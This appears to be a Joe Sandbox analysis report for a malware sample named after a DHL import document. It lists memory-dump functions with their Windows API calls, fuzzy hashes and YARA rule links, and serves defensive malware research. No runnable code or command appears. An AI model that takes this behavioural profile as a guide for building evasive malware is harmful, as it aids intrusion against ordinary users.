Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 4ff1a4e101f3b94fd52025c2ddf27cb8e5b9f8d16cf26ea11ad41429d306a058
Instruction ID: 810b290e2a696ef0e02304d6e11775b89e2d49073abe86a623f2c13856a60d96
Opcode Fuzzy Hash: 4ff1a4e101f3b94fd52025c2ddf27cb8e5b9f8d16cf26ea11ad41429d306a058
Instruction Fuzzy Hash: 8F216D35610018AFDB258F94E898EFA7FF9FB89350F148159F9094B261C735A990FB60

Function 0054D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0057CB68), ref: 0054D2FB
GetLastError.KERNEL32 ref: 0054D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0054D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0057CB68), ref: 0054D376

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: f0c72f5a4fbab791d6e0a86f0cc68449d20e161a99cf1436a27a6ecc8f8e0086
Instruction ID: ad2902a009ef1b565f7f9f654b41338922ed57f4adce31568245f6590087d299
Opcode Fuzzy Hash: f0c72f5a4fbab791d6e0a86f0cc68449d20e161a99cf1436a27a6ecc8f8e0086
Instruction Fuzzy Hash: 92217C745082019F8710DF29D8818AA7BF4BF5A368F504E5EF499D32A1D7309D49DBA3

Function 00541571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00541014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0054102A
Part of subcall function 00541014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00541036
Part of subcall function 00541014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00541045
Part of subcall function 00541014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0054104C
Part of subcall function 00541014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00541062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005415BE
_memcmp.LIBVCRUNTIME ref: 005415E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00541617
HeapFree.KERNEL32(00000000), ref: 0054161E

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 9fed9ee668489904f6c66f1d9dea097ff2c841e99428b948789a2c8a67d33385
Instruction ID: b2a30393a67e83f4b78a720c59004594834ef04e098c68df3581c375ae70013d
Opcode Fuzzy Hash: 9fed9ee668489904f6c66f1d9dea097ff2c841e99428b948789a2c8a67d33385
Instruction Fuzzy Hash: 60219D31E00509EFDF10DFA4C949BEEBBB8FF84348F094459E445AB241E730AA85DBA4

Function 00572782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0057280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00572824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00572832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00572840

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 897b21f4b6e0b4b0a8b29f43cb8ecad44076cb4f2d38cd9dd7feb72bd29aa525
Instruction ID: 8ef07509d5b7b8a3a5daa5634d76ceeddbf2a6452d9298b9e18810aa5515edb0
Opcode Fuzzy Hash: 897b21f4b6e0b4b0a8b29f43cb8ecad44076cb4f2d38cd9dd7feb72bd29aa525
Instruction Fuzzy Hash: F221B031204211AFD7149B25E844FAA7F95FF85328F14815CF42A8B6E2C776EC82DB91

Function 005478F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00548D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0054790A,?,000000FF,?,00548754,00000000,?,0000001C,?,?), ref: 00548D8C
Part of subcall function 00548D7D: lstrcpyW.KERNEL32(00000000,?,?,0054790A,?,000000FF,?,00548754,00000000,?,0000001C,?,?,00000000), ref: 00548DB2
Part of subcall function 00548D7D: lstrcmpiW.KERNEL32(00000000,?,0054790A,?,000000FF,?,00548754,00000000,?,0000001C,?,?), ref: 00548DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00548754,00000000,?,0000001C,?,?,00000000), ref: 00547923
lstrcpyW.KERNEL32(00000000,?,?,00548754,00000000,?,0000001C,?,?,00000000), ref: 00547949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00548754,00000000,?,0000001C,?,?,00000000), ref: 00547984

Strings

cdecl, xrefs: 0054797B

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: f4266ffab1b82db4a760a26830a6f456270500b29406fc84cdc4d2a44ebef3da
Instruction ID: c03a9864b6a791fdf47c0a17dcb9751eeac31350eb8a7261fc7ad95e7d8dc17c
Opcode Fuzzy Hash: f4266ffab1b82db4a760a26830a6f456270500b29406fc84cdc4d2a44ebef3da
Instruction Fuzzy Hash: 8211263A200346ABCB159F35D848DBA7BA9FF99354B40402EF906C72A4EB319801D7A1

Function 00577CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00577D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00577D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00577D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0055B7AD,00000000), ref: 00577D6B

Part of subcall function 004F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004F9BB2

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 29826a52de4bc92b364d59d188b71102aa13f25ccbf2d5b70e9e1c166a30a86b
Instruction ID: 125455d2b8e794ee10a50793f1e5923dd9cb8d2b2c64ffe87178ec7c5a6f91dc
Opcode Fuzzy Hash: 29826a52de4bc92b364d59d188b71102aa13f25ccbf2d5b70e9e1c166a30a86b
Instruction Fuzzy Hash: BC11AE31104618AFCB208F68EC04AA63FA4BF49360B258728F839C72E0D7319D60EB80

Function 00575660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 005756BB
_wcslen.LIBCMT ref: 005756CD
_wcslen.LIBCMT ref: 005756D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00575816

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 5f998f42c85578886aba5261f4036800b4f7c2dfe0d724b7f56e0fa3612ae03f
Instruction ID: 396eb7d01ca171bafbcdf5a7cba7ff1dbecedbfa06b7e0124216fa6b72352c5f
Opcode Fuzzy Hash: 5f998f42c85578886aba5261f4036800b4f7c2dfe0d724b7f56e0fa3612ae03f
Instruction Fuzzy Hash: B511B471A0060996DF209F65AC89AEE7F6CFF50760F50842AFA1DD6081F7B09984EF60

Function 00511D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ae2bd6e29204308e349eb27665b4f4c96e6d62d1afe7668079e8a947f6dad6a
Instruction ID: 70612b36f144cce137ee81ad630141f309ada367d28965211abb5e3e92c40377
Opcode Fuzzy Hash: 7ae2bd6e29204308e349eb27665b4f4c96e6d62d1afe7668079e8a947f6dad6a
Instruction Fuzzy Hash: 04018FB2209A167EF61126787CC5FA76E1CFF913B8F300769F625552D2DB608CD091A4

Function 00541A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00541A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00541A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00541A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00541A8A

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 800fb9f5627b434ffa85130e34c6eb2a0ff9755822e5e2146280ac163148e3df
Instruction ID: 0b1398c7d18e1a4cc0edeaa3b6ea638dc9d5e695deab8bff6eb791e618dbfea1
Opcode Fuzzy Hash: 800fb9f5627b434ffa85130e34c6eb2a0ff9755822e5e2146280ac163148e3df
Instruction Fuzzy Hash: B1115A3A901219FFEB10DBA5C984FEDBB78FB04354F200491E601B7290C6716E50DB94

Function 0054E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0054E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0054E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0054E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0054E24D

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 00a586f99bd4a55d42c62ab838713731264742c7062f2987492baea125d8f926
Instruction ID: 266c9d04cc556611193318ebc95bbb5f6de17bb0a1e3b6d644c1427e835f7244
Opcode Fuzzy Hash: 00a586f99bd4a55d42c62ab838713731264742c7062f2987492baea125d8f926
Instruction Fuzzy Hash: FB110876904214BBC7019FA8AC0AADF7FEDBB55364F404729F816E3290D6B0990897A0

Function 0050D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0050CFF9,00000000,00000004,00000000), ref: 0050D218
GetLastError.KERNEL32 ref: 0050D224
__dosmaperr.LIBCMT ref: 0050D22B
ResumeThread.KERNEL32(00000000), ref: 0050D249

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 574dabfb60ecb706147f06e96ea6fa093a1d56fcca75ee5505de9ee6ebce9dee
Instruction ID: 20224cdb4745713423348ccc8edaf75746737daa57fdc8f9bd01aa3a69e96172
Opcode Fuzzy Hash: 574dabfb60ecb706147f06e96ea6fa093a1d56fcca75ee5505de9ee6ebce9dee
Instruction Fuzzy Hash: 8401C03A805206BBDB216BE5DC09BAE7E79FF81730F100219F929961D0DF708985D7B0

Function 004E600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004E604C
GetStockObject.GDI32(00000011), ref: 004E6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 004E606A

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 95b81b89fbbf93c7a728f3a41550b6201a5addddfe37e97fe81e445d0fb689fb
Instruction ID: 862e3da308fb214e7ef67c50da9e3fb6bd71aeb930a82992873d5020abad8a98
Opcode Fuzzy Hash: 95b81b89fbbf93c7a728f3a41550b6201a5addddfe37e97fe81e445d0fb689fb
Instruction Fuzzy Hash: D011A172501558BFEF129FA59C44EEB7F69FF283A5F01021AFA0552110C736ACA0EB94

Function 00503B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00503B56

Part of subcall function 00503AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00503AD2
Part of subcall function 00503AA3: ___AdjustPointer.LIBCMT ref: 00503AED

_UnwindNestedFrames.LIBCMT ref: 00503B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00503B7C
CallCatchBlock.LIBVCRUNTIME ref: 00503BA4

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 61f6d99c12695321ac729eab75d39d39a0dfa32ab5d04ec5466199f23d95db84
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 9101177210014ABBDF126E95CC4AEEF3F6DFF88758F044414FE4856161C732E9619BA0

Function 00513073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004E13C6,00000000,00000000,?,0051301A,004E13C6,00000000,00000000,00000000,?,0051328B,00000006,FlsSetValue), ref: 005130A5
GetLastError.KERNEL32(?,0051301A,004E13C6,00000000,00000000,00000000,?,0051328B,00000006,FlsSetValue,00582290,FlsSetValue,00000000,00000364,?,00512E46), ref: 005130B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0051301A,004E13C6,00000000,00000000,00000000,?,0051328B,00000006,FlsSetValue,00582290,FlsSetValue,00000000), ref: 005130BF

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 4093143e9f8e11bad5d8f4ab5aac33a4d5456b4be3d2241b9f79dd71b6b83ea3
Instruction ID: 19677d5540c18126c51aa078304372d53ab3b189fdd14a3f50190c68f950b730
Opcode Fuzzy Hash: 4093143e9f8e11bad5d8f4ab5aac33a4d5456b4be3d2241b9f79dd71b6b83ea3
Instruction Fuzzy Hash: DD014C36301622ABE7304B78AC5C9977FD8BF19760B100A24F909E3140D721D9C9D7E0

Function 00547464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0054747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00547497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 005474AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 005474CA

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: fb82e9730dd3b0d3957f3a067163070cfffad1ffb7ced292c97820b3ef1a6a97
Instruction ID: d3bd57f95be89064780635607d19862131fc1796ba280fbc787c6a8d8fe1eeaa
Opcode Fuzzy Hash: fb82e9730dd3b0d3957f3a067163070cfffad1ffb7ced292c97820b3ef1a6a97
Instruction Fuzzy Hash: 531161B52053199BEB208F54EC09FE27FFCFB04B08F10856DA66AD6151D770E948EBA0

Function 0054B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0054ACD3,?,00008000), ref: 0054B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0054ACD3,?,00008000), ref: 0054B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0054ACD3,?,00008000), ref: 0054B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0054ACD3,?,00008000), ref: 0054B126

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 4bd6da1953da46b42d1c7d55a56bd240c61adf87dac71619eea41abc8f29edd8
Instruction ID: 41fb708fc74205ebe62c1e06d7535ebcfc87f729446d8b9b2e9c84d4d690adf5
Opcode Fuzzy Hash: 4bd6da1953da46b42d1c7d55a56bd240c61adf87dac71619eea41abc8f29edd8
Instruction Fuzzy Hash: C1118B30C0052CEBDF08AFE4E9586EEBF78FF59315F00449AD945B2181CB308650EB51

Function 00542DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00542DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00542DD6
GetCurrentThreadId.KERNEL32 ref: 00542DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00542DE4

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 1187eb5b1f36d7b9a2872e82e00b716470d6342989132aba9726b09b71d68240
Instruction ID: 27d772d0daaa7f33e5e77dad9ec33e1c3a390427ee82f3c558dbe02411753093
Opcode Fuzzy Hash: 1187eb5b1f36d7b9a2872e82e00b716470d6342989132aba9726b09b71d68240
Instruction Fuzzy Hash: 32E092B15012347BD7201B76AC4DFEB7E6CFF62BB5F800019F109D10809AA4C885E6B0

